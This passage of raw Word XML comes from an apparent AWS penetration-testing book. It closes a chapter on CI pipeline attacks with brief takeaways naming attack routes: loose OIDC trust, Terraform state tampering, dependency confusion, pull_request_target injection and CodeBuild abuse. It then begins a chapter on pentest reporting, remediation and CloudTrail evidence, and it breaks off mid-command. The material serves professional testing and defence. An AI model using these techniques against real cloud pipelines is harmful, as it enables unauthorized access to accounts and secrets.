    <w:p w14:paraId="14412278" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>19.6  IaC pipeline injection writ large</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D4064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theme across this chapter is that the boundary between </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>code that describes infrastructure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>code that executes with AWS credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is very thin in CI. A compromise of the former is a compromise of the latter. Operators who break into AWS via a CI path are often not breaking AWS's security controls at all; they are breaking the identity provider (GitHub, GitLab, Jenkins) and using its relationship to AWS as a trusted pipe. The defender's mitigation is correspondingly not an AWS-first mitigation — it is a CI-first mitigation: enforce branch protection, enforce CODEOWNERS on workflow files, require separate review on workflow changes, us</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">e narrow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> conditions, and pin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specific commit SHAs for any third-party action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E026DFF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E42A80E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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GitHub Actions OIDC trust over-broadening (missing or overly wildcarded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) is the most common modern entry vector; CloudFox's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>role-trusts --filter-oidc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> finds them in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E35E172" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Terraform state files are high-value artifacts; reading them maps the environment, writing them can cause arbitrary resource creation on the next apply.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7416D3BD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Dependency confusion against Lambda and Amplify builds continues to succeed because private-registry enforcement is uncommon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC5E748" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Workflow injection via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>pull_request_target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> turns a PR into a CI-scoped RCE, usually with access to the AWS OIDC role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0546851C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>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CodeBuild and CodePipeline are IAM-PassRole bridges: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StartBuild</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a powerful project is RCE under the project's role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D2F60" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Chapter 20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Reporting, Detection Engineering, and Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BF7C8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An engagement ends not when the operator finishes testing but when the client has an actionable document. Chapter 20 walks the last mile: structuring a report that is usable by both the executive sponsor and the engineering team that will fix the findings, translating findings into detection content the client's SOC can deploy, and offering remediation guidance that is specific enough to implement in Terraform on Monday morning. Reporting discipline is the difference between an engagement that produces a sp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ike in anxiety followed by nothing and one that produces measurable improvement in the client's security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D18E3E4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>20.1  Report structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEB790C"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modern AWS offensive-security report has five sections. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Executive summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: one page, written for the sponsor, with the engagement's goals, the top three findings by severity, and the strategic narrative (how the findings connect, what class of attacker would exploit them, and what the aggregate risk is). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Engagement scope and methodology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: a prose description of what was tested, what was out of scope, what tools and techniques were used, and what constraints were operative (time-boxed, specific objectives, rules of engagement exclusions). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: one finding per primitive, each with severity, prerequisite conditions, exploitation steps, observed impact, affected principals/resources, and CloudTrail/log evidence. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Attack narrative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: a prose chapter that walks the mission from initial access to objective completion, connecting findings into a story. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Remediation roadmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: a prioritized, dated list of remediations with ownership suggestions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F8552"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Of these five, the attack narrative is the most commonly omitted and the most valuable. A client reading a long list of findings sees discrete misconfigurations; a client reading the narrative sees how five benign misconfigurations chained to produce admin in their prod account. The narrative is what justifies the engagement's budget.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFA6AF7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>20.2  Finding anatomy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E646D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Each finding should contain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1838A06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Title.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A descriptive noun phrase, not a headline. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Overly-broad trust on OIDC role </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github-deploy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a title; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Critical IAM risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6DE09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Severity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Per a scoring system the client understands. CVSS 3.1 is the lingua franca; many organizations prefer a cloud-specific alternative like the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SSVC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> framework. Internal consistency matters more than which system is used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454DC68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Affected resources.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Specific ARNs. "The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github-deploy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> role" is not specific enough; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>arn:aws:iam::111122223333:role/github-deploy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6732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Prerequisites.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> What the attacker must have held to exploit the finding. "Any push to the MyOrg/MyRepo repo" is a prerequisite that tells the defender the blast radius.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3B680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Exploitation steps.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The exact commands, with their CloudTrail evidence. This is the part that proves the finding is real.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25134A89"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Observed impact.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> What the operator did do (not what they could do). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Assumed the role, listed all Secrets Manager secrets, read three</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is observed impact; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>could potentially read all secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701F29D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Recommended remediation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Specific and implementable. Not "tighten the trust policy"; instead, "replace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StringLike sub: repo:MyOrg/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StringEquals sub: repo:MyOrg/MyRepo:ref:refs/heads/main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7694B5D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References.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Links to AWS documentation, MITRE ATT&amp;CK sub-technique id(s), and — where applicable — CVEs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4210841F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>20.3  CloudTrail evidence per finding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA967B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Every finding that involved an AWS API call should include at minimum: the event time, the event id, the event name, and the source IP that appeared in CloudTrail. This is the evidence the client's incident responders will use to validate that the operator is the source of the event. Without this correlation, an internal forensic investigation of the operator's actions can produce false positives and slow down remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FC91C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The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>evidence.jsonl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> described in Chapter 17 is the operator-side record; the CloudTrail-side record can be pulled post-engagement via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws cloudtrail lookup-events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> filtered on the operator's principal ARN. Running this query for each finding's timestamp range produces the report's evidence block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B713EE8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1723359615"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> cloudtrail lookup-events \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22872C4A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1723359615"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --lookup-attributes AttributeKey=Username,AttributeValue=op-mancuso \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BADCD7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1723359615"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --start-time </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"2026-04-15T00:00:00Z"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B6E24C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1723359615"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --end-time </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"2026-04-20T23:59:59Z"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38144E4F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1723359615"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'Events[].[EventTime,EventName,EventId,CloudTrailEvent]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
